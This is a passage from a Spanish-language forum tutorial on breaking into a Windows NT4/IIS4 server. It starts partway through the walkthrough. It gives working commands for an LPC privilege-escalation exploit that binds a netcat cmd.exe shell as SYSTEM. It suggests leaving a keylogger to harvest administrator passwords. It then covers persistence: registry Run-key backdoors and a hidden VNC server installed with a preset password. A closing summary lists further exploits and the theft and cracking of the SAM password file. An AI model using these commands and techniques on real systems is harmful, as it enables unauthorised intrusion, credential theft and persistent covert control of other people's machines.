tftp -i 192.168.10.250 GET hk.exe
Transfer successful: 32768 bytes in 1 second, 32768 bytes/s

ahora lo ejecutamos dirigiendolo hacia el netcat, con esto lo que conseguimos es que el netcat sea utilizado por el sistema en vez de por nosotros, gracias a ello, el entorno en el que se ejecutará tendrá permisos de sistema.

D:\Inetpub\scripts>hk nc -L -p 25 -d -e cmd.exe
hk nc -L -p 25 -d -e cmd.exe
lsass pid & tid are: 50 - 53
Launching line was: nc -L -p 25 -d -e cmd.exe
Who do you want to be today?NtImpersonateClientOfPort succeeded

desde otra terminal vamos al nuevo puerto del netcat .


[cyrux@net /cyrux]#nc 192.168.10.1 25
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
D:\Inetpub\scripts>whoami
whoami
NT AUTHORITY\SYSTEM



Vemos que tenemos una shell con permisos de "SYSTEM" . Ahora podemos hacer remotamente lo mismo que podriamos hacer si estuvieramos sentados delante del PC.

NOTA: Como en este ejemplo estamos estudiando un Windows NT4, estamos utilizando exploits que corren bajo NT4, si el PC objetivo fuese un Windows 2000, no sería necesariamente mas seguro, puesto que existen exploits que causan el mismo efectoen el Win2K, como por ejemplo los exploits basados en .printer overflow (ISAPI)...


3.4: Dejando un Keylogger:

Otra opción es dejar simplemente un keylogger silencioso en el server, para que, transcurridos unos dias, puedas bajarte el archivo en el que supuestamente han quedado guardados todos los pass que hayan sido introducidos durante esos dias, entre los que seguramente esté el del Administrador.

Puedes reiniciar tu mismo el server como dijimos antes, con el exploit del CSRSS



4: Dejando una puerta trasera:

Por supuesto lo normal es dejar una manera de volver a entrar en el server sin tener que volver a hacer todo esto, vamos a tratar de explicar algunas que por ser poco convencionales, tal vez resulten mas interesantes

 

4.1: Claves en el inicio del registro
Llegados a este punto, y con los passwords en nuestro poder, ya podemos hacer un montón de cosas, pero vamos a hacer algo que tal vez no sea de lo mas habitual, vamos a acceder al registro del PC objetivo.

El Servicio de registro remoto está activado el la instalación por defecto, pero para poder acceder a el necesitamos tener permisos de administrador y estar conectados a él como tal.

Para ello vamos a conectarnos por NetBIOS, hacemos lo siguiente:


C:\>net use q: \\192.168.10.1\d$ /user:administrador *
Type the password for \\192.168.10.1\d$: <password aquí>
The command completed successfully.

Si el servicio de registro remoto estuviera deactivado por el administrador del sistema, podriamos activarlo desde la shell remota del PC objetivo, con el siguiente comando:

c:\>net start "Servicio de registro remoto"

Pero para ello hace falta tener permisos de administrador, en caso de necesitar activar el registro, puedes ver como conseguir una shell con permisos suficientes
en el paso 3.3:Exploit del LPC

Ahora ya podemos usar el regedit para conectarnos:






En este momento podemos añadir cualquier cosa en el inicio del Windows, estos son algunos lugares interesantes donde añadir lo que deseemos:


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices


Por ejemplo vamos a poner el netcat escuchando aquí de manera que se inicie cada vez que se inicie el sistema, al iniciarse así tendrá permisos de sistema.

Podemos añadir, en el PC objetivo, una linea como por ejemplo esta:



Cada vez que el PC objetivo se inicie podremos llamar a nuestro netcat

[cyrux@net /cyrux]# nc 192.168.10.1 443
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
D:\WINNT\Profiles\Administrador\Escritorio>whoami
whoami
NT_VICTIMA\Administrador

Como vemos a partir de ahora podremos user el netcat con permisos de Administrador.


4.2 : Control remoto con interfaz NT.

Todo esto normalmente es mas que suficiente, pero si somos perfeccionistas, aun podemos hacer algo mas:

VNC es un programa de control remoto de uso muy fácil, que consta de dos partes, server, cliente (como muchos troyanos), y que permite a un usuario remoto ver el escritorio del PC en el que se está ejecutando el server e interactuar con el como si estuviera sentado delante del PC, sin ningún tipo de restricción.

Existen versiones de cliente y de servidor tanto para linux como para Windows, por lo que en este caso el sistema operativo no es un problema, puedes bajartelas desde aquí.

Supongamos que estamos en nuestro Windows y ya nos hemos bajado el VNC, ahora necesitamos subir al PC remoto los archivos winvnc.exe, vnchooks.dll, y omnithread_rt.dll. Es aconsejable esconderlos en un directorio poco frecuentado.

Para subirlo vamos a utilizar la conexión de NetBIOS que creamos antes, y colocamos el omnithread_rt.dll en \winnt\system32\ y el winvnc.exe y el vnchook.dll en el \winnt\system32\viewers.

Ahora necesito crear unas claves en el registro. Las claves que necesitas las puedes encontrar en tu propio PC, instalando el VNC y viendo que claves han cambiado.

Este es un ejemplo de un posible archivo que podriamos crear, en el que estamos estbleciendo la configuración que tendrá nuestro vnc:

\registry\users\.default\software\orl

VNCHooks

Application_Prefs

CALC.EXE

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000000
use_KeyPress = REG_DWORD 0x00000000
use_LButtonUp = REG_DWORD 0x00000000
use_Deferral = REG_DWORD 0x00000001

CLOCK.EXE

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000001
use_KeyPress = REG_DWORD 0x00000000
use_Deferral = REG_DWORD 0x00000001
use_LButtonUp = REG_DWORD 0x00000000

explorer.exe

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000000
use_KeyPress = REG_DWORD 0x00000001
use_Deferral = REG_DWORD 0x00000001
use_LButtonUp = REG_DWORD 0x00000000
use_MButtonUp = REG_DWORD 0x00000001
use_RButtonUp = REG_DWORD 0x00000001

iexplore.exe

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000000
use_KeyPress = REG_DWORD 0x00000001
use_Deferral = REG_DWORD 0x00000001
use_LButtonUp = REG_DWORD 0x00000001

mspaint.exe

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000000
use_KeyPress = REG_DWORD 0x00000001
use_LButtonUp = REG_DWORD 0x00000001
use_Deferral = REG_DWORD 0x00000001

NOTEPAD.EXE

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000000
use_KeyPress = REG_DWORD 0x00000001
use_Deferral = REG_DWORD 0x00000001
use_LButtonUp = REG_DWORD 0x00000001
use_MButtonUp = REG_DWORD 0x00000001
use_RButtonUp = REG_DWORD 0x00000001

winlogon.exe

use_GetUpdateRect = REG_DWORD 0x00000001
use_Timer = REG_DWORD 0x00000000
use_KeyPress = REG_DWORD 0x00000001
use_LButtonUp = REG_DWORD 0x00000001
use_MButtonUp = REG_DWORD 0x00000001
use_RButtonUp = REG_DWORD 0x00000001
use_Deferral = REG_DWORD 0x00000001


\registry\machine\software\orl\winvnc3\default

AllowProperties = REG_DWORD 0x00000000
AllowShutdown = REG_DWORD 0x00000001
AutoPortSelect = REG_DWORD 0x00000001
InputsEnabled = REG_DWORD 0x00000001
OnlyPollConsole = REG_DWORD 0x00000001
OnlyPollOnEvent = REG_DWORD 0x00000000
Password = REG_BINARY 0x0000008 da 36 c0 9d 72 2a 8a 28
PollForeground = REG_DWORD 0x00000001
PollFullScreen = REG_DWORD 0x00000001
PollUnderCursor = REG_DWORD 0x00000000
SocketConnect = REG_DWORD 0x00000001

Con esas claves crea un archivo llamado por ejemplo "vnc.ini", bájate de aquí el archivo ya creado

La línea Password = REG_BINARY 0x0000008 da 36 c0 9d 72 2a 8a 28 corresponde al password, en nuestro caso a la palabra "hacknt4".

Para añadir la clave en el registro remoto necesitamos una utilidad llamada regini.exe que está incluida en el NT Workstation Resource Kit, bajate de aquí el regini.exe .

Existen numerosas variantes del vnc original, así como muchos tipos de "vnc.ini" dependiendo de la configuración que le querramos dar. Puedes bajarte un paquete llamado fastpush2_5 que contiene todos los archivos necesrios, así como el regtools y ayudas para instalar el vnc de forma remota.

Movemos el vnc.ini al mismo directorio que el regini.exe y añadimos el archivo al registro del PC remoto de la siguiente manera:

C:\>regini.exe -m \\192.168.10.1 vnc.ini


Instalamos el VNC en el PC remoto desde nuestra shell en la máquina objetivo:

D:\WINNT\system32\viewers>winvnc -install
winvnc -install

De esta manera el VNC se instala como un servicio, por lo que no es necesario que haya nadie en el PC remoto.

Sólo nos queda iniciarlo:

D:\WINNT\system32\viewers>net start winvnc
net start winvnc
The VNC Server service is starting.
The VNC Server service was started successfully.


Ahora desde nuestro PC utilizamos el cliente del VNC para conectarnos al PC remoto, que está ya ejecutando el server del VNC:

Introducimos la IP del PC remoto:


y nos solicita el password, que en nuestro caso era "hacknt4"



Y todo listo para disfrutar del escritorio remoto desde nuestro cliente de VNC, ya sea desde un Linux, como desde un Windows, como en esta captura.



Reumen:

Averiguamos todo lo que podamos del server que estamos investigando: puertos abiertos, servicios, sistema operativo, etc.
Subimos lo que necesitemos al PC remoto.
Como es un NT con IIS (servidor de web) utilizamos el bug de Unicode para poder subir el netcat, y lo dejamos escuchando en el server, pero sólo con permisos de usuario IUSR_NT_VICTIMA.
Como se trata concretamente de un IIS4 podríamos utilizar el exploit IISHack2 del gupe eEye, para subir y ejecutar en la máquina el archivo que querramos.
Tenemos que elevar los privilegios que tenemos, para ello podemos hacer varias cosas:
Utilizando el exploit SECHOLE
Nos hacemos con el archivo de passwords (sam) utilizando el exploit del MDAC.
Lo crackeamos con le LophtCrack 3
Explotamos el bug del LPC, subimos el exploit hk.exe (con el bug de unicode, de MDAC o por netbios, dependiendo de los pasos que hayamos seguido hasta aquí) para ejecutar el netcat, de esta manera nuestra sesión con el netcat tendrá permisos de SYSTEM.
Podemos dejar un keylogger en ol PC objetivo, y bajarnos el log con los pass despues de unos dias.
Dejamos una puerta trasera:
1.      Si tenemos el pass del Administrador, creamos una conexión por netbios con el PC remoto, para despues conectar con el servicio remoto e introducir una clave en el registro para que se ejecute el netcat con permisos de administrador cada vez que se arranque el PC.

2.      Con los permisos de Administrador para poder añadir claves a registro remoto, subimos el servidor del VNC (programa de gestión remota) y utilizamos el regini para añadir las claves necesarias al registro remoto, y lo ejecutamos desde la shell (netcat)
Páginas: 1 ... 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 [42]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines